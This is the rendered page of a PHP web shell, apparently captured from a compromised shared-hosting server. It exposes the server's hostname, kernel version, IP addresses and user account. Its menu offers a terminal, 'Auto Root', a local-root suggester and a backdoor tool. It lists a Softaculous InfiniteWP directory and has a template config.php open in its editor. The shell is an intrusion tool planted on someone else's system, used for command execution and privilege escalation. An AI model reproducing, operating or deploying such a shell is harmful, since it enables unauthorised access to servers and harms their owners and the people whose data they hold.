Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.216.32
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
iwp /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-01-05 21:12
php53
[ DIR ]
drwxr-xr-x
2026-01-05 21:12
php56
[ DIR ]
drwxr-xr-x
2026-01-05 21:12
php71
[ DIR ]
drwxr-xr-x
2026-01-05 21:12
php81
[ DIR ]
drwxr-xr-x
2026-01-05 21:12
php82
[ DIR ]
drwxr-xr-x
2026-01-05 21:12
clone.php
4.76
KB
-rw-r--r--
2026-01-05 06:03
config.php
1.1
KB
-rw-r--r--
2026-01-05 04:44
edit.php
4.36
KB
-rw-r--r--
2026-01-05 06:03
edit.xml
447
B
-rw-r--r--
2025-06-25 03:18
fileindex.php
281
B
-rw-r--r--
2025-06-25 03:16
import.php
3.21
KB
-rw-r--r--
2026-01-05 06:03
info.xml
2.18
KB
-rw-r--r--
2026-01-05 04:44
install.js
921
B
-rw-r--r--
2021-12-23 06:54
install.php
4.68
KB
-rw-r--r--
2026-01-05 06:03
install.xml
1.09
KB
-rw-r--r--
2021-12-23 06:54
md5
1.37
KB
-rw-r--r--
2026-01-05 06:03
notes.txt
818
B
-rw-r--r--
2025-06-26 07:07
Save
Rename
<?php #Show Error define('APP_SHOW_ERROR', true); @ini_set('display_errors', (APP_SHOW_ERROR) ? 'On' : 'Off'); error_reporting(E_ALL & ~E_NOTICE & ~E_STRICT); if(defined('E_DEPRECATED')) { error_reporting(error_reporting() & ~E_DEPRECATED); } if(function_exists('phpversion')){ if(version_compare(phpversion(),'8.0.0','>=')){ error_reporting(error_reporting() & ~E_WARNING); define('IWP_PHP8',true); } } define('SHOW_SQL_ERROR', APP_SHOW_ERROR); define('APP_VERSION', '3.5.2'); define('APP_INSTALL_HASH', '[[APP_INSTALL_HASH]]'); define('APP_ROOT', dirname(__FILE__)); define('APP_DOMAIN_PATH', '[[softurl_no_http]]/'); define('APP_V3', 1); define('APP_ROOT_V2', dirname(__FILE__)); define('APP_DOMAIN_PATH_V2', '[[softurl_no_http]]/'); define('EXECUTE_FILE', 'execute.php'); define('DEFAULT_MAX_CLIENT_REQUEST_TIMEOUT', 180);//Request to client wp $config = array(); $config['SQL_DATABASE'] = '[[softdb]]'; $config['SQL_HOST'] = '[[softdbhost]]'; $config['SQL_USERNAME'] = '[[softdbuser]]'; $config['SQL_PASSWORD'] = '[[softdbpass]]'; $config['SQL_PORT'] = '3306'; $config['SQL_TABLE_NAME_PREFIX'] = '[[dbprefix]]';